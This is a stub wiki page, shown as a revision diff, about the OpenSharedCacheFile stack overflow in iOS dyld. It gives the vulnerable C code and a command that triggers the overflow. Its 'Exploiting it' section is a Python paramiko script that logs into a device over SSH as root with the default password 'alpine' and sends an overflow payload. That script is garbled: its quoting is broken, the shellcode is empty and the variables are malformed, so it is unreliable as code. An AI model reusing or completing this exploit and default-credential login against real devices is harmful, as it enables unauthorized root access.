The iPhone Wiki is no longer updated. Visit this article on The Apple Wiki for current information. |
Difference between revisions of "OpenSharedCacheFile"
(→Exploiting it) |
|||
Line 23: | Line 23: | ||
junk = "A" * 1024 |
junk = "A" * 1024 |
||
shellcode = "" |
shellcode = "" |
||
− | payload = DYLD_SHARED_CACHE_DIR |
+ | payload = "DYLD_SHARED_CACHE_DIR" |
+ | actual = payload+junk+shellcode \ |
||
− | cmd = DYLD_SHARED_REGION = private /bin/launchctl |
||
+ | cmd = "DYLD_SHARED_REGION = "private /bin/launchctl" |
||
ssh = paramiko.SSHClient() |
ssh = paramiko.SSHClient() |
||
server = "" #whatever IP |
server = "" #whatever IP |
||
ssh.connect(server, username=root, password=alpine) |
ssh.connect(server, username=root, password=alpine) |
||
− | ssh.exec_command( |
+ | ssh.exec_command(actual) |
ssh.exec_command(cmd) |
ssh.exec_command(cmd) |
||
Revision as of 19:10, 24 March 2015
The OpenSharedCacheFile bug was found by i0n1c. This bug is a simple stack overflow.
int openSharedCacheFile() { char path[1024]; strcpy(path, sSharedCacheDir); strcat(path, "/"); strcat(path, DYLD_SHARED_CACHE_BASE_NAME ARCH_NAME); return ::open(path, O_RDONLY); }
Triggering the vuln
To trigger it, run the following
DYLD_SHARED_CACHE_DIR = "A" * 2000 \ DYLD_SHARED_REGION = private /bin/launchctl
This will overflow the PC register making it a stack overflow.
Exploiting it
Since this bug can takeover the PC register, you first need to know where the bug starts for now lets say it crashes after 1024 A's, so your payload to get root would be
junk = "A" * 1024 shellcode = "" payload = "DYLD_SHARED_CACHE_DIR" actual = payload+junk+shellcode \ cmd = "DYLD_SHARED_REGION = "private /bin/launchctl" ssh = paramiko.SSHClient() server = "" #whatever IP ssh.connect(server, username=root, password=alpine) ssh.exec_command(actual) ssh.exec_command(cmd)
This article is a "stub", an incomplete page. Please add more content to this article and remove this tag. |